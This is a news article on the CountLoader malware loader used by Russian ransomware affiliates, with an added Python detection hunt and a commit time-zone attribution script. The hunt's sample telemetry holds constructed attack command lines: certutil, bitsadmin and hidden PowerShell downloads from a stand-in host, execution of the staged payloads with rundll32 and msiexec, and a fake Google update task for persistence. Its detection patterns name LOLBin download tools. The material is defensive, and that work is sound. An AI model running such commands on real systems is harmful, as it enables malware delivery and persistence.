Cybersecurity & Digital Rights

CountLoader Broadens Russian Ransomware Operations With Multi-Model Malware Loader

By NextTech, September 22, 2025
Cybersecurity researchers have discovered a new malware loader, codenamed CountLoader, that Russian ransomware gangs have used to deliver post-exploitation tools such as Cobalt Strike and AdaptixC2, as well as a remote access trojan known as PureHVNC RAT.

“CountLoader is being used either as part of an Initial Access Broker’s (IAB) toolset or by a ransomware affiliate with ties to the LockBit, Black Basta, and Qilin ransomware groups,” Silent Push said in an analysis.

Appearing in three different versions, .NET, PowerShell, and JavaScript, the emerging threat has been observed in a campaign targeting individuals in Ukraine that uses PDF-based phishing lures impersonating the National Police of Ukraine. Silent Push told The Hacker News that it does not have any insight into the nature of the malware dropped by CountLoader in that campaign.

It is worth noting that the PowerShell version of the malware was previously flagged by Kaspersky as being distributed using DeepSeek-themed decoys to trick users into installing it.

Those attacks, per the Russian cybersecurity vendor, led to the deployment of an implant named BrowserVenom that reconfigures every browser instance on the host to force its traffic through a proxy controlled by the threat actors, allowing them to manipulate network traffic and collect data.

Silent Push’s investigation found that the JavaScript version is the most fully developed implementation of the loader. It offers six different methods for downloading files, three different methods for executing malware binaries, and a predefined function to identify the victim’s device based on Windows domain information.

The malware can also gather system information, set up persistence on the host by creating a scheduled task that impersonates a Google update task for the Chrome web browser, and connect to a remote server to await further instructions.

Those instructions include downloading and running DLL and MSI installer payloads via rundll32.exe and msiexec.exe, transmitting system metadata, and deleting the scheduled task it created. The six download methods rely on curl, PowerShell, MSXML2.XMLHTTP, WinHTTP.WinHttpRequest.5.1, bitsadmin, and certutil.exe. All of these are legitimate Windows components or commonly present tools, so the downloads blend in with ordinary administrative activity unless process command lines are being logged and reviewed.

“By using LOLBins like ‘certutil’ and ‘bitsadmin,’ and by implementing an ‘on the fly’ command encryption PowerShell generator, CountLoader’s developers demonstrate here a sophisticated understanding of the Windows operating system and malware development,” Silent Push said.

A notable aspect of CountLoader is its use of the victim’s Music folder as a staging ground for malware. The .NET flavor shares some functional overlap with its JavaScript counterpart but supports only two command types (UpdateType.Zip or UpdateType.Exe), indicating a reduced, stripped-down build.
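The download, execution, staging and persistence behaviour described in the last few paragraphs can be turned into a hunt over process-creation telemetry. The following is an added example written for this page, not Silent Push’s code and not the loader itself; it assumes a Sysmon-style event schema (image, command line, parent image), and its task names, file paths and the 203.0.113.10 address are constructed for illustration. Only the techniques come from the write-up.

```python
"""Hunt for the CountLoader tradecraft described above in process-creation
telemetry: LOLBin downloads, execution from the Music folder, and a
scheduled task posing as the Chrome updater.

Added example, not Silent Push's analysis code and not the loader itself.
Events use a generic Sysmon-like schema (image, command_line, parent_image).
Every sample event is constructed; task names, paths and the 203.0.113.10
address are assumptions, only the techniques come from the write-up.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    image: str          # full path of the created process
    command_line: str
    parent_image: str


# Download methods named in the write-up, keyed by the process they run in.
# MSXML2.XMLHTTP and WinHttp.WinHttpRequest.5.1 are COM objects, so they only
# surface when script text is on the command line or in script-block logs.
DOWNLOADERS = {
    "certutil.exe":   re.compile(r"-urlcache|-verifyctl", re.I),
    "bitsadmin.exe":  re.compile(r"/transfer|/addfile", re.I),
    "curl.exe":       re.compile(r"https?://", re.I),
    "powershell.exe": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b", re.I),
}
COM_DOWNLOADERS = re.compile(r"MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest\.5\.1", re.I)
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Execution methods named in the write-up.
EXECUTORS = {
    "rundll32.exe": re.compile(r"\.dll\b", re.I),
    "msiexec.exe":  re.compile(r"/i\b|/package\b", re.I),
}

MUSIC_DIR = re.compile(r"\\Users\\[^\\]+\\Music\\", re.I)
TASK_NAME = re.compile(r'/tn\s+"?([^"\s]+)', re.I)
GOOGLE_INSTALL_DIR = re.compile(r"Program Files( \(x86\))?\\Google\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: Event) -> list[str]:
    """Return the rule names one event trips (empty list if clean)."""
    hits = []
    img, cl = basename(ev.image), ev.command_line
    staged = bool(MUSIC_DIR.search(cl))

    pat = DOWNLOADERS.get(img)
    if pat and pat.search(cl):
        hits.append("lolbin_download_to_music" if staged else "lolbin_download")
    if img in SCRIPT_HOSTS and COM_DOWNLOADERS.search(cl):
        hits.append("com_downloader_in_script")

    pat = EXECUTORS.get(img)
    if pat and pat.search(cl) and staged:
        hits.append(f"exec_from_music:{img}")

    # A task named like the Chrome updater whose action lives outside Google's
    # install directory is the persistence pattern the write-up describes.
    if img == "schtasks.exe" and "/create" in cl.lower():
        m = TASK_NAME.search(cl)
        if m and "google" in m.group(1).lower() and not GOOGLE_INSTALL_DIR.search(cl):
            hits.append("fake_google_update_task")
    return hits


def hunt(events: list[Event]) -> dict[str, list[str]]:
    """Group tripped rules with the command lines behind them and add a
    'countloader_chain' entry when download-to-Music, execute-from-Music and
    the fake update task all appear, i.e. the full sequence described above."""
    findings: dict[str, list[str]] = {}
    for ev in events:
        for rule in evaluate(ev):
            findings.setdefault(rule, []).append(ev.command_line)
    stages = {rule.split(":")[0] for rule in findings}
    if {"lolbin_download_to_music", "exec_from_music", "fake_google_update_task"} <= stages:
        findings["countloader_chain"] = ["download -> execute from Music -> fake Google task"]
    return findings


WS = r"C:\Windows\System32\wscript.exe"   # assumed parent: the JS loader's script host
SAMPLE_EVENTS = [  # constructed telemetry, not captured from a real infection
    Event(r"C:\Windows\System32\certutil.exe",
          r"certutil.exe -urlcache -split -f http://203.0.113.10/upd.bin C:\Users\alice\Music\upd.dll", WS),
    Event(r"C:\Windows\System32\bitsadmin.exe",
          r"bitsadmin.exe /transfer job1 /download /priority normal http://203.0.113.10/p.msi C:\Users\alice\Music\p.msi", WS),
    Event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r'powershell.exe -nop -w hidden -c "$h=New-Object -ComObject WinHttp.WinHttpRequest.5.1;$h.Open(\"GET\",\"http://203.0.113.10/x\",0);$h.Send()"', WS),
    Event(r"C:\Windows\System32\rundll32.exe",
          r"rundll32.exe C:\Users\alice\Music\upd.dll,DllRegisterServer", WS),
    Event(r"C:\Windows\System32\msiexec.exe",
          r"msiexec.exe /i C:\Users\alice\Music\p.msi /qn", WS),
    Event(r"C:\Windows\System32\schtasks.exe",
          r'schtasks.exe /create /tn "GoogleUpdateTaskUser" /tr "wscript.exe C:\Users\alice\Music\u.js" /sc minute /mo 15 /f', WS),
    # benign look-alikes that must stay quiet
    Event(r"C:\Windows\System32\schtasks.exe",
          r'schtasks.exe /create /tn "GoogleUpdateTaskMachineUA" /tr "\"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe\" /ua" /sc daily',
          r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"),
    Event(r"C:\Windows\System32\certutil.exe",
          r"certutil.exe -verify C:\Temp\cert.cer", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for rule, cmds in hunt(SAMPLE_EVENTS).items():
        print(f"[{rule}]")
        for cmd in cmds:
            print("   ", cmd)
```

The chain rule is what separates an administrator’s certutil from a loader: a download into the Music folder, followed by rundll32 or msiexec on a path in that same folder, followed by a Google-named task whose action points outside Google’s install directory. The COM download objects are invisible in plain process telemetry when they are called from a .js file rather than a one-liner, so pair this with PowerShell script-block logging (event ID 4104) for the PowerShell flavor and with file-creation events under the Music folder for the JavaScript one.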

CountLoader is backed by an infrastructure of more than 20 unique domains, and serves as a conduit for Cobalt Strike, AdaptixC2, and PureHVNC RAT, the last of which is a commercial offering from a threat actor known as PureCoder. PureHVNC RAT is a predecessor of PureRAT, which is also known as ResolverRAT.

Recent campaigns distributing PureHVNC RAT have used the tried-and-tested ClickFix social engineering tactic as a delivery vector, with victims lured to the ClickFix phishing page through fake job offers, according to Check Point. The trojan is deployed by means of a Rust-based loader.

“The attacker lured the victim through fake job advertisements, allowing the attacker to execute malicious PowerShell code through the ClickFix phishing technique,” the cybersecurity company said, describing PureCoder as using a revolving set of GitHub accounts to host files that support PureRAT’s functionality.

Analysis of the GitHub commits revealed that activity was conducted from the UTC+03:00 time zone, which covers many countries, Russia among them. Commit timestamps and their offsets come from the committer’s own machine and can be set arbitrarily, so on its own this is a weak attribution signal rather than proof.
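The time-zone observation is a check anyone with a clone of the repositories can repeat. As an added example written for this page (not Check Point’s tooling), the script below tallies the UTC offsets in git log output and applies two sanity checks a practitioner would want: whether the commits fall in working hours for the inferred offset, and which commits were rewritten or made elsewhere (author and committer offsets differ). The log lines are constructed for illustration, not taken from the PureRAT repositories.

```python
"""Tally commit time-zone offsets to estimate where a GitHub account's
owner works, the check behind the UTC+03:00 observation above.

Added example, not Check Point's tooling. It expects lines produced by
    git log --format='%H|%aI|%cI'
(author date and committer date, ISO-8601 with offset). SAMPLE_LOG is
constructed for illustration and is not from the PureRAT repositories.
"""
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Commit:
    sha: str
    author_date: datetime
    committer_date: datetime


def parse_log(text: str) -> list[Commit]:
    """Parse 'sha|author_iso|committer_iso' lines; blank lines are skipped."""
    commits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        sha, author, committer = line.strip().split("|")
        commits.append(Commit(sha, datetime.fromisoformat(author),
                              datetime.fromisoformat(committer)))
    return commits


def fmt_offset(delta: timedelta) -> str:
    """Render a UTC offset as 'UTC+HH:MM' / 'UTC-HH:MM'."""
    minutes = int(delta.total_seconds()) // 60
    sign = "+" if minutes >= 0 else "-"
    minutes = abs(minutes)
    return f"UTC{sign}{minutes // 60:02d}:{minutes % 60:02d}"


def offset_histogram(commits: list[Commit]) -> Counter:
    """Count commits per author-date UTC offset."""
    return Counter(fmt_offset(c.author_date.utcoffset()) for c in commits)


def dominant_offset(commits: list[Commit]) -> tuple[str, int]:
    return offset_histogram(commits).most_common(1)[0]


def working_hours_share(commits: list[Commit], start: int = 8, end: int = 20) -> float:
    """Fraction of commits whose wall-clock hour (in the commit's own offset)
    falls inside a normal working day; a plausible offset should score high."""
    in_hours = sum(start <= c.author_date.hour < end for c in commits)
    return in_hours / len(commits)


def rewritten(commits: list[Commit]) -> list[str]:
    """SHAs whose committer offset differs from the author offset: rebases,
    cherry-picks, or commits made through a web UI or CI rather than the
    developer's workstation. Weight these less when attributing."""
    return [c.sha for c in commits
            if c.author_date.utcoffset() != c.committer_date.utcoffset()]


SAMPLE_LOG = """
a1b2c3|2025-08-11T10:12:44+03:00|2025-08-11T10:12:44+03:00
b2c3d4|2025-08-11T15:40:01+03:00|2025-08-11T15:40:01+03:00
c3d4e5|2025-08-12T09:05:19+03:00|2025-08-12T09:05:19+03:00
d4e5f6|2025-08-13T18:27:58+03:00|2025-08-13T18:27:58+03:00
e5f6a7|2025-08-14T11:51:03+03:00|2025-08-14T13:02:40+00:00
f6a7b8|2025-08-15T07:33:12+00:00|2025-08-15T07:33:12+00:00
"""  # constructed log, not real commit metadata

if __name__ == "__main__":
    cs = parse_log(SAMPLE_LOG)
    print(offset_histogram(cs))
    print("dominant:", dominant_offset(cs))
    print(f"working-hours share: {working_hours_share(cs):.2f}")
    print("author/committer offset mismatch:", rewritten(cs))
```

Run `git log --format='%H|%aI|%cI'` in a clone of each account’s repositories and feed the text to parse_log. Two caveats keep the result from being proof of anything: git records the author date and offset from the committer’s own clock and environment (GIT_AUTHOR_DATE, `git commit --date`), so they can be set to any value; and UTC+03:00 is shared by Moscow, Minsk, Istanbul, Riyadh and Nairobi, which is why the article says only that it corresponds to many countries.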

The development comes as the DomainTools Investigations team has documented the interconnected nature of the Russian ransomware landscape, identifying threat actors moving between groups and the shared use of tools such as AnyDesk and Quick Assist, which suggests operational overlaps.

“Brand allegiance among these operators is weak, and human capital appears to be the primary asset, rather than specific malware strains,” DomainTools said. “Operators adapt to market conditions, reorganize in response to takedowns, and trust relationships are essential. These individuals will choose to work with people they know, regardless of the name of the group.”
